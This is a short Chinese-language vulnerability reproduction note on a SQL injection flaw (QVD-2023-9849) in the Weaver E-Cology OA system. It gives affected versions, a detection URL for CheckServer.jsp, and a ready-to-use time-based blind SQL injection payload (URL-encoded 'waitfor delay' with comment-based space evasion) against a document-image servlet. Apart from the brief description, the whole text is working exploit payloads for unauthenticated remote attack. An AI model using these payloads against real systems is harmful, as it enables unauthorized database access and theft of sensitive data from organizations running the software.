泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

1.漏洞描述

泛微 Ecology OA 系统对用户传入的数据过滤处理不当，导致存在 SQL 注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

影响版本：泛微 Ecology 9.x <= v10.56；泛微 Ecology 8.x <= v10.56

2.漏洞复现

POC

/mobile/plugin/CheckServer.jsp?type=mobileSetting

返回状态码200且参数值为{"error";"system error"}证明漏洞存在

进行延时注入：

/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%2F**%2Fand(select%2F**%2F1)%3E0%2F**%2Fwaitfor%2F**%2Fdelay'0%3A0%3A10'%2F**%2F

0%3A0%3A10 实际上表示 0:0:10 延时10秒